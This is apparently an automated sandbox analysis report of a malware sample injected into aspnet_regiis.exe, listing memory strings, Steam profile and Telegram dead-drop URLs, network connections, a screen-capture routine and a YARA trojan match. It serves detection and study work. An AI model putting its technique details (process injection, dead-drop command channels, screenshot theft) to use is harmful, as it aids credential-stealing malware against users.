                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                      Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://help.steampowered.com/en/
                      Source: DBFIEH.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                      Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://mozilla.org0/
                      Source: file.exeString found in binary or memory: https://pidgin.im0
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                      Source: file.exeString found in binary or memory: https://sectigo.com/CPS0
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/discussions/
                      Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                      Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/market/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                      Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611997804188699&
                      Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869Y
                      Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                      Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49711 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.9:49712 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A11F55 CreateStreamOnHGlobal, GetDesktopWindow, GetWindowRect, GetDC, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt, GetHGlobalFromStream, GlobalLock, GlobalSize, SelectObject, DeleteObject, DeleteObject, ReleaseDC, CloseWindow

                      System Summary

                      Source: 3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
                      Source: 3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
                      Source: file.exe Static PE information: section name:
                      Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5BA4E0 GetModuleHandleW, NtQueryInformationProcess
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0145B GetCurrentProcess, NtQueryInformationProcess
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CACB700 NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CACB8C0 rand_s, NtQueryVirtualMemory
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CACB910 rand_s, NtQueryVirtualMemory, NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error, GetLastError
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CA6F280 NtQueryVirtualMemory, GetProcAddress, NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA3E503_2_6CAA3E50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAB77A03_2_6CAB77A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA6DFE03_2_6CA6DFE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA96FF03_2_6CA96FF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA79F003_2_6CA79F00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA77103_2_6CAA7710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA960A03_2_6CA960A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA8C0E03_2_6CA8C0E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA58E03_2_6CAA58E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAD50C73_2_6CAD50C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAAB8203_2_6CAAB820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAB48203_2_6CAB4820
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA778103_2_6CA77810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAAF0703_2_6CAAF070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA888503_2_6CA88850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA8D8503_2_6CA8D850
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA6C9A03_2_6CA6C9A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA9D9B03_2_6CA9D9B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAA51903_2_6CAA5190
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CAC29903_2_6CAC2990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA7D9603_2_6CA7D960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CABB9703_2_6CABB970
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CADB1703_2_6CADB170
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA8A9403_2_6CA8A940
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CA622A03_2_6CA622A0
